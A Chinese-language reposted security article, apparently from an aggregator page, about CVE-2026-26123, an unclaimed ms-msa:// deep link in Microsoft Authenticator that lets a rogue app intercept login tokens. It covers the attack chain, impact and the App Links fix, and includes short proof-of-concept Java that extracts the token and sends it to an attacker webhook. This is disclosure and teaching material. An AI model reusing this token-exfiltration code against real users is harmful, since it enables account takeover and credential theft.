【CVE-2026-26123】微软身份认证器 DeepLink 漏洞
微软身份验证器漏洞剖析:一个被“遗弃”的深层链接如何导致账户全面失守
安全领域时常上演这样的故事:最坚固的堡垒,往往从一道无人看管的侧门被攻破。近期一个已被编号为CVE-2026-26123的漏洞,正是这样一个典型案例。该漏洞已得到缓解,并经由负责任披露流程提交至微软安全响应中心。
免费影视、动漫、音乐、游戏、小说资源长期稳定更新! 👉 点此立即查看 👈
问题的核心,出在微软身份验证器中一个用于安全引导用户登录或启用双因素认证的ms-msa://深层链接上。这个链接本身并未被应用正确声明。
正是这一看似技术性的疏忽,酿成了一场“完美风暴”:任何恶意应用都可以轻松拦截其中传递的身份验证令牌,最终导致攻击者能完全接管用户账户——包括双因素认证、密码要求在内的所有安全防护,在此刻形同虚设。

一、背景设定:当便利遭遇灾难
不妨设想一个再常见不过的场景:你正在手机上配置微软身份验证器。按照流程,微软的网页界面生成了一个二维码。你自然而然地拿出手机,用系统自带的摄像头扫描它,然后点击屏幕上弹出的“打开链接”……就在这一瞬间,你的账户控制权可能已经拱手让人。
最可怕的是,整个过程天衣无缝,你对此将毫无察觉。
二、深度链接灾难剖析
1. 什么是深层链接?
简单来说,Android的深层链接功能,允许用户从一个链接(可能来自网页、搜索结果或通知)被直接带入特定应用的内部页面。
你可以把这些深层链接理解为具有专属“暗号”的URL,专门用来唤醒对应的应用。日常生活中随处可见:
spotify://track/... 会打开Spotify播放歌曲;uber:// 能直接启动Uber叫车界面;而 ms-msa:// —— 本应打开微软身份验证器。
请注意,这里的关键词是“本应”。
2. 漏洞:一个数字遗弃案例
当微软身份验证器为账户设置生成二维码时,它会创造出类似下面这样的深层链接:
ms-msa://code=M.C544_BL2.2.U.60e61ddd-1d08-127d-d783-bda9b7v&uaid=88498cfad78b4669aaec4b7a1c8&expires=3964722534
这个链接里携带的令牌,堪称“数字黄金”。它是能绕开所有防线——双因素认证、密码、安全问题——的直接身份验证凭证,无异于一把万能钥匙。
那么,离谱的事情来了:微软身份验证器自身,竟然没有“认领”这个本该属于它的深层链接。
这意味着,当这个链接通过以下几种最常见的方式被触发时:
- 手机原生二维码扫描器
- 网页中的直接点击
- ADB命令发送的隐式意图
结果是什么?错误。应用甚至不会启动。用户点击“打开链接”后,被启动的很可能是攻击者预先埋设的恶意应用。

3. 利用:深层链接劫持入门
由于正主“抛弃”了自家的链接,任何应用都可以宣告对这个链接的所有权。没有竞争,用户也不会收到“请选择用哪个应用打开”的提示。恶意应用默认成为赢家。
经验证,这一情况在最新的Android和iOS系统,以及当时最新的微软身份验证器版本上均存在。
4. 构建“伪造身份验证器”
打造一个用于演示的概念验证应用,简单到几乎令人尴尬:
步骤1:注册被遗弃的深层链接
只需在恶意应用的配置文件中声明如下意图过滤器:
步骤2:提取并外传令牌
在应用启动后,几行代码就能截获关键信息:
Intent intent = getIntent();
Uri data = intent.getData();
String token = data.getQueryParameter("code");
// 将令牌发送到攻击者控制的服务器
sendToWebhook(token);

步骤3:获利
凭借窃取到的令牌,攻击者几乎可以为所欲为:
- 直接通过身份验证器生成有效的双因素认证代码
- 无需密码即可登录受害者的微软账户
- 获得对账户的完全访问权限
可能因此沦陷的服务列表长得吓人:电子邮件、Office全家桶、Microsoft Teams、OneDrive、Skype、Outlook等等。

5. 攻击链
整个攻击流程可以清晰还原:
- 受害者访问微软登录页面。
- 页面生成包含
ms-msa://深层链接的二维码。 - 受害者使用手机原生摄像头扫描(这是标准操作流程)。
- 手机弹出“打开链接”提示。
- 恶意应用无声拦截——真正的微软身份验证器根本没有出现。
- 令牌被发送至攻击者的服务器。
- 攻击者使用令牌,成功登录。
三、影响:完整的账户接管
这绝非纸上谈兵的理论漏洞,其实际影响极为严重:
- 范围极广:所有使用微软账户的服务均暴露在风险之下。
- 防护尽失:双因素认证、密码、安全警报等层层防护被一并绕过。
- 极难察觉:攻击过程完全沉默,受害者收不到任何异常通知。
更危险的是,该攻击所需的用户交互极少(仅是扫描二维码这个被鼓励的正规操作),且恶意应用除了基础的网络访问权限外,无需申请任何可疑权限,极容易通过应用商店审核。
四、修复措施:正确实施应用链接
解决方案在技术上并不复杂:正确实施并验证Android应用链接即可。应用链接通过关联网站域名,能够确保特定的URL只能由指定的应用打开,从而从根本上杜绝此类劫持。
五、对安全工程师和开发者的教训
这个案例给所有人敲响了警钟:必须定期审计应用中的所有深层链接,务必为关键链接实施应用链接验证。身份验证流程值得投入最高级别的安全审查。道理很明白:你可以打造世界上最坚固的锁,但如果把钥匙随手放在门垫下面,一切防护都是徒劳。
看,关键而简单的漏洞,往往就藏在这些最基础的地方。
六、时间线与披露
此漏洞已获得CVE编号认可,并已得到微软的修复缓解。整个概念验证仅需网络权限,这使其隐蔽性和危险性尤为突出。
建议所有用户将微软身份验证器更新至最新版本,以确保安全。
原文参考:https://khaledsec.medium.com/e0409a920a02?sk=df506976e7c2d15fd29e70725873f6e2
游乐网为非赢利性网站,所展示的游戏/软件/文章内容均来自于互联网或第三方用户上传分享,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系youleyoucom@outlook.com。
同类文章
长城魏牌 V9X 标轴版车型官图公布,4 月 16 日开启预售
长城魏牌 V9X 标轴版官图发布,4月16日开启预售 4月10日,长城汽车旗下魏牌正式揭晓了V9X标轴版车型的官方图片。这款备受关注的新车轴距设定为3050mm,并已确定将于4月16日启动预售。 先看外观,标轴版车型完整延续了品牌标志性的“东方经典建筑美学”设计语言。车头部分,发光悬浮车标的设计颇为
保时捷 2026 年一季度全球交付量同比下滑 15%,中国市场暴跌 21%
保时捷2026年开局遇冷:转型阵痛与市场寒流 2026年的春天,对于跑车巨头保时捷而言,似乎有些寒意。最新数据显示,这家以性能著称的制造商在第一季度全球仅交付了60,991台新车,与去年同期相比,下滑幅度达到了15%。 这盆冷水,主要浇在了两个关键市场:中国和北美。尤其是其电动化板块,未能扛起增长大
特斯拉 FSD 登陆欧洲,但和美国版很不一样
特斯拉FSD登陆欧洲,但和美国版很不一样 2026年4月10日,欧洲自动驾驶领域迎来一个关键节点:荷兰车辆管理局(RDW)为特斯拉的FSD(完全自动驾驶能力)驾驶辅助系统(监督版)颁发了欧洲首张车型认证许可。这意味着,荷兰成为欧洲大陆首个批准特斯拉这套半自动驾驶系统在公共道路上向用户开放的国家。 这
美国洛杉矶警察局遭黑客入侵,7.7 TB 敏感文件泄露
洛杉矶警局遭遇大规模数据泄露,约7 7TB敏感文件流入网络 最近,网络安全领域又添了一桩引人注目的事件。根据《洛杉矶时报》的报道,一个勒索软件黑客组织成功侵入了美国洛杉矶警局的系统,窃取了规模惊人的数据——总量高达约7 7TB。目前,警方正在紧急评估此次事件的具体影响范围。 那么,这些被窃取的数据究
网友吐槽张雪机车业务员太狂了!张雪:提供证据、奖励1万
网友吐槽张雪机车业务员态度问题,创始人万元悬赏求证据 4月13日,一则来自云南网友的留言,将张雪机车推到了管理话题的风口浪尖。该网友在张雪的社交账号下直言,其公司业务员态度“过于狂妄”,希望公司能加强管理。面对这一投诉,张雪的回应堪称“教科书级别”。 他没有选择回避或简单道歉,而是第一时间要求投诉者
- 日榜
- 周榜
- 月榜
1
2
3
4
5
6
7
8
9
10
1
2
3
4
5
6
7
8
9
10
1
2
3
4
5
6
7
8
9
10
相关攻略
2015-03-10 11:25
2015-03-10 11:05
2021-08-04 13:30
2015-03-10 11:22
2015-03-10 12:39
2022-05-16 18:57
2025-05-23 13:43
2025-05-23 14:01
热门教程
- 游戏攻略
- 安卓教程
- 苹果教程
- 电脑教程
热门话题

